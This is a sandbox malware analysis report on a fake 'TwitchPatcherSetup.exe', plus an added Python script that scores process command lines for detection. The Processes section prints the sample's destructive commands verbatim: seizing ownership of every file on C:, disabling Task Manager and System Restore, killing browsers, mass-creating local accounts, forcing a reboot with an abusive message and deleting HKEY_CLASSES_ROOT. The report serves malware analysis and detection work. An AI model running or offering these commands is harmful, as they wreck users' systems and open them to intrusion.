Malware Analysis Report

2024-11-16 12:47

Sample ID 240806-x9t53aybkl
Target TwitchPatcherSetup.exe
SHA256 df9336b06d2a84b387a5d597d5d1ac01b81523c059cf535b53b1d43bfcedf5d7
Tags
discovery exploit persistence privilege_escalation ransomware
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

df9336b06d2a84b387a5d597d5d1ac01b81523c059cf535b53b1d43bfcedf5d7

Threat Level: Likely malicious

The file TwitchPatcherSetup.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit persistence privilege_escalation ransomware

Possible privilege escalation attempt

Blocklisted process makes network request

Checks computer location settings

Drops startup file

Event Triggered Execution: Component Object Model Hijacking

Executes dropped EXE

Modifies file permissions

Modifies system executable filetype association

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Modifies system certificate store

Delays execution with timeout.exe

Kills process with taskkill

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

Uses Volume Shadow Copy WMI provider

Runs net.exe

Script User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 19:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win7-20240708-en

Max time kernel

82s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers\Compatibility C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\{8895b1c6-b41f-4c1c-a562-0d564250836f} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers C:\Windows\system32\reg.exe N/A

Enumerates connected drives


Drops file in Program Files directory


Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\DllHost.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry class


Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Windows\System32\WScript.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2076 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe C:\Windows\system32\cmd.exe
PID 924 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 924 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 924 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 924 wrote to memory of 1736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 924 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe

"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C11E.tmp\C11F.bat C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

C:\Windows\system32\takeown.exe

takeown /f C:\*.*

C:\Windows\system32\icacls.exe

Icacls C:\*.* /C /G Admin:F

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9388.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9057.vbs"

C:\Windows\system32\timeout.exe

timeout 60

C:\Windows\system32\rundll32.exe

rundll32 user32.dll, SwapMouseButton

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\22951.vbs"

C:\Windows\system32\timeout.exe

timeout 14

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}

C:\Windows\system32\taskkill.exe

taskkill /F /IM hl2.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM javaw.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM RobloxPlayerBeta.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM FortniteClient-Win64-Shipping.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Among Us.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\system32\shutdown.exe

shutdown -r -t 300 -c "Dans 5 minutes tu n'as plus de PC fils de viol, la OGK t'a bien baiser le cul :)"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\13200.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16799.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1123.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29779.vbs" 11577.bat

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\11577.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\system32\net.exe

net user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 18-25 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 18-25 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user T'A bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user T'A bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user BIEN bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user BIEN bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user D?TRUIT bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user D?TRUIT bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user CUL bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user CUL bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user ENFANT bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user ENFANT bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user DE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user DE bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user SATAN bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user SATAN bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 265822375520895 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 265822375520895 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 19125836817209 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 19125836817209 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 30108148877259 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 30108148877259 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 239251573925627 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 239251573925627 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 18963165974 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 18963165974 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 1632344953653 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 1632344953653 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 4678262487395 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 4678262487395 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 937014730975 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 937014730975 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 311411974722731 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 311411974722731 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 20505218385761 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 20505218385761 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 271022012222756 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 271022012222756 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 20921730826316 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 20921730826316 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 265822599218799 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 265822599218799 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 103561796027639 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 103561796027639 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 123482739727087 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 123482739727087 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 200142976626644 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 200142976626644 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 315832113316963 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 315832113316963 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 230521891520729 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 230521891520729 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F
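Read top to bottom, the Processes list above is the batch file C11F.bat driving the whole detonation: it takes ownership of and regrants every file under C:\ to the current user, disables Task Manager and System Restore through the registry, swaps the mouse buttons, kills browsers and games, schedules a reboot with a French-language taunt in the shutdown comment, mass-creates local accounts with one shared password, and deletes HKEY_CLASSES_ROOT twenty times (which is what the "Modifies system executable filetype association" signature in the summary is reacting to). The \??\PIPE\samr entry under Files, hashed as zero bytes, is the SAM RPC pipe those net user commands travel over, not a dropped file. The following is an added example, not part of the sandbox report or of the sample: a small Python triage routine that runs the sort of rules a detection engineer would put over process-creation command lines (Sysmon event 1 or Windows 4688) against this report's command lines. The sample list is constructed from the Processes section (net1.exe rows dropped because net.exe spawns them itself, the shutdown comment abbreviated, two benign lines added), and the ATT&CK technique mapping, weights and verdict thresholds are the editor's own assumptions.

```python
"""Command-line triage for the batch-driven payload in this report.

Editor's added example. Rules, ATT&CK mapping, weights and thresholds are
assumptions chosen to illustrate the technique, not values from the report.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample input: command lines copied from the Processes section.
# net1.exe rows are omitted (net.exe re-launches itself as net1.exe), the
# shutdown comment is abbreviated, and two benign lines give the rules
# something to ignore.
SAMPLE_CMDLINES = [
    r'takeown /f C:\*.*',
    r'Icacls C:\*.* /C /G Admin:F',
    r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f',
    r'rundll32 user32.dll, SwapMouseButton',
    r'taskkill /F /IM chrome.exe',
    r'taskkill /F /IM explorer.exe',
    r'shutdown -r -t 300 -c "..."',
    r'net user LE bitasse /add /expire:never /active:yes',
    r'net user LE bitasse /add /expire:never /active:yes',
    r'net user SATAN bitasse /add /expire:never /active:yes',
    r'reg delete HKCR /F',
    r'reg delete HKCR /F',
    r'timeout 60',
    r'ipconfig /all',
]

# Same pattern serves the account rule and the account extractor below.
NET_USER_ADD = re.compile(r'^net1?\s+user\s+(\S+)\s+\S+\s+/add\b', re.I)


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str      # ATT&CK ID (editor's mapping, see lead-in)
    pattern: re.Pattern
    weight: int


RULES = [
    # takeown/icacls aimed at a whole volume root, not a single file
    Rule("ACL takeover of a volume root", "T1222.001",
         re.compile(r'^(?:takeown\s+/f|icacls)\s+[a-z]:\\\*\.\*', re.I), 4),
    Rule("Task Manager disabled by policy key", "T1562.001",
         re.compile(r'^reg\s+add\b.*\bDisableTaskMgr\b.*/d\s+1\b', re.I), 2),
    Rule("System Restore disabled", "T1490",
         re.compile(r'^reg\s+add\b.*\bDisableSR\b.*/d\s+1\b', re.I), 3),
    Rule("local account created", "T1136.001", NET_USER_ADD, 2),
    Rule("HKEY_CLASSES_ROOT deleted", "T1485",
         re.compile(r'^reg\s+delete\s+HKCR\b', re.I), 4),
    # T1489 (Service Stop) is the closest fit for forced kills of user apps
    Rule("forced kill of shell/browser/game", "T1489",
         re.compile(r'^taskkill\s+/f\s+/im\s+', re.I), 1),
    Rule("forced reboot with countdown", "T1529",
         re.compile(r'^shutdown\b.*\s-r\b', re.I), 2),
]


def triage(cmdlines):
    """Match each command line against RULES.

    Returns (score, findings); findings is a list of (rule name, technique,
    hit count). Hits per rule are capped at 3 when scoring so the twenty
    'reg delete HKCR' rows count as one pattern, not twenty.
    """
    hits = Counter()
    for line in cmdlines:
        for rule in RULES:
            if rule.pattern.search(line.strip()):
                hits[rule] += 1
    score = sum(rule.weight * min(n, 3) for rule, n in hits.items())
    findings = sorted(((r.name, r.technique, n) for r, n in hits.items()),
                      key=lambda f: (-f[2], f[0]))
    return score, findings


def accounts_created(cmdlines):
    """Deduplicated usernames from 'net user <name> <password> /add' lines.

    The batch file runs some names twice and net.exe repeats each command
    via net1.exe, so raw row counts overstate what was actually created.
    """
    names = set()
    for line in cmdlines:
        m = NET_USER_ADD.search(line.strip())
        if m:
            names.add(m.group(1))
    return sorted(names)


def verdict(score):
    """Coarse banding; thresholds are an assumption, tune to your telemetry."""
    if score >= 10:
        return "destructive"
    if score >= 4:
        return "suspicious"
    return "benign"


if __name__ == "__main__":
    score, findings = triage(SAMPLE_CMDLINES)
    print(f"score={score} verdict={verdict(score)}")
    for name, technique, n in findings:
        print(f"  [{technique}] {name} (x{n})")
    print("accounts created:", ", ".join(accounts_created(SAMPLE_CMDLINES)))
```

Two design points worth keeping when porting this to a SIEM: anchor every rule on the image name at the start of the command line rather than on a bare substring, so an ordinary `icacls C:\Users\x\file /grant` does not fire the volume-root rule, and cap per-rule repeats before scoring, otherwise a script that loops one harmless command drowns out the single `DisableSR` write that matters most for recovery.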

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.80:80 crl.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C11E.tmp\C11F.bat

MD5 e5097bb73edc13e33242930a46f4e976
SHA1 1e644b0f44a4e1ea3612a3adea61d2a984f06605
SHA256 97041695f1a22009f88d14a0ab45b61f6ef0c7fd962af2e7495de690df27cbe1
SHA512 7581babda9be534dee091cb9d3bbef984ce0d7c11accdf1fcf409d446c156ba56759c24a822b83e9d9c5413702a99733838f6ed16b3d2e3bfe6ad03c5fe44a9e

C:\Users\Admin\AppData\Local\Temp\9388.vbs

MD5 ed4068f59e84632317fe338a2892ecb1
SHA1 260ca0f384ec0784933794a7aed6fb0ac8aaec23
SHA256 24baf9de71f49028cf6188127dea430347bee63f553225dc93c97db83a4ffeaf
SHA512 93774b5f8e54c16cf65db696613201b88bf64847e8558b8171ec7351e9cdc133a28df6a9f3269add80b8a588761bf9b2c40015cdd5b3e068cee9d069b66be1c5

C:\Users\Admin\AppData\Local\Temp\9057.vbs

MD5 17b8608905bad5079f8ef5d1c8b9aafb
SHA1 65864828c6bc101e9234453e0be83b46868f96e7
SHA256 4d909b6c65777ad719bf85bd5e9de00739b962f2c0bab4a49c0c31fa268e93fc
SHA512 5f2fee37de012f090267c3ad1f4fa2ff5051aa4bf6c5a2a476a4b4e9b1272b16301d3c82d38f33732b767447de8da2ce967a26c1952048c1e8315c7d8e1bfbc1

C:\Users\Admin\AppData\Local\Temp\22951.vbs

MD5 4148025b2c24c93fd1e7d85860e6b816
SHA1 0b5b79f0c4d44b0ebdb990ee6b662f835a07dd98
SHA256 3cb01880c6a02c5f8aad54ee9d5e6a3500777e20c4c07ea56fa267e16f3ad7e0
SHA512 bdf85f2a0581895a28b93dc7038b2d269bdc4a290b778fe3467834b5d8d203f340f41563cfc9c77e22f63a7646c5ce83861c94f687d2dbda06055163a6f8a943

C:\Users\Admin\AppData\Local\Temp\1123.vbs

MD5 523092d53a06f5b46778a0cd7c01d0fb
SHA1 221a8244271afdbe7ce105aaf189f1dbcfa57cdb
SHA256 09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e
SHA512 72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

C:\Users\Admin\AppData\Local\Temp\13200.vbs

MD5 27bf402bae00ba56abb7fce0eac5fe88
SHA1 7b17239cc71d9a3bd2a42307cc7059a2b2616ce7
SHA256 f54c91b6da58a43d45cd300670055e9569f7006a6428fd5e875b0c59feb0771d
SHA512 6cc36a79ed28cf292c4e6220ee026f3dc47779684600801d60424ca64a53cbff453e983f97559dc93927cccac94a23bf2c0f49cb826b047db9b409fe599c37ef

C:\Users\Admin\AppData\Local\Temp\16799.vbs

MD5 8a9b451fd9936100f33b576bb5ec3f02
SHA1 80c92544f733ddfb96dffa296293fb2835e85f2e
SHA256 4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455
SHA512 b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

C:\Users\Admin\AppData\Local\Temp\21530.vbs

MD5 03b33eb1d025801e1882fc0ba1135c71
SHA1 9a92fcaddcc864bf25eecf1c4165ff0da22016a2
SHA256 338d26cb8fe98ff9377e335a1480cdc37977f346b132ab149cdd33220e0728d7
SHA512 92260a7eb7f760a511900bf5b53f47109783c1b6ca49aa930c171b15b85ac608c2c7243b1fad73baf33b9368e988780f5185f117ff0061b62cd67f138798cfcd

C:\Users\Admin\AppData\Local\Temp\29779.vbs

MD5 ec385d968eea8bf5abe4587305f39c89
SHA1 6509b0bb7cb6432a4c723f37dc7593116ad57c64
SHA256 98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96
SHA512 d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

C:\Users\Admin\AppData\Local\Temp\11577.bat

MD5 c87a392101c9ef2d198ae207e7be82d8
SHA1 c2a3248515376ce6e2f2c3b9d0cc7c8bb6bb55d3
SHA256 8663b0814f18599336aa812324595fe88448c2ceba2994953e0d0b3ae2695bb5
SHA512 416a02c66c9ed020b607db4fb44cd9c09b437f112c235545473fccea5342cbc105cb120d0af859022cc737444fd63a3de637f260468931494a5dd9d1e3d662dd

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

